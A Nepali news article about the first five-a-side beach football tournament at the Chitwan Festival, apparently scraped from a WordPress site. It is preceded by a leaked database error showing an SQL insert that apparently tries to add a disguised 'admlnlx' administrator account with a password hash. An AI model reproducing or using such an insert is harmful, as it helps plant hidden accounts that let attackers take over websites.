WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BRxTx2s9ADXTHgok6yn7hQaIc6uFX1.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 08:08:56', '', 'admlnlx', 'admlnlx')
चितवन, पुस २८–
चितवन महोत्सव स्थलमा आजदेखि पहिलो पटक फाइभ ए साइड बीच फुटबल प्रतियोगिताको सुरु हुँदैछ ।
नारायणी नदी किनारमा हुने फुटबलमा जिल्लाका १० वटा टिमको सहभागिता रहने महोत्सवको खेलकुद समितिका संयोजक प्रशान्त कुमार पियाले जानकारी दिनुभयो । सो फुटबल प्रतियोगिताको फाइलन खेल पुस २९ गते शुक्रबार हुँदैछ । प्रत्येक समूहमा पाँच पाँच जना रहेर खेलिने फुटबलमा नारायणगढ फुटबल क्लब, बसन्त युनाइटेड क्लबसहितका १० वटा समूहहरु प्रतिष्पर्धा गर्ने संयोजक पियाले जानकारी दिनुभयो ।
प्रतियोगिताको विजेताले २० हजार रुपैयाँ नगद सहित ट्रफी, मेडल र प्रमाणपत्र पाउनेछन् भने उपविजेताले १० हजार रुपैयाँ सहित ट्रफी, मेडल र प्रमाणपत्रमा चित्त बुझाउनुपर्ने पियाले जानकारी दिए । यो प्रतियोगिता चितवनमा पहिलो पटक हो भने चितवन महोत्सवमा पहिलो पटक आयोजना गरिएको हो ।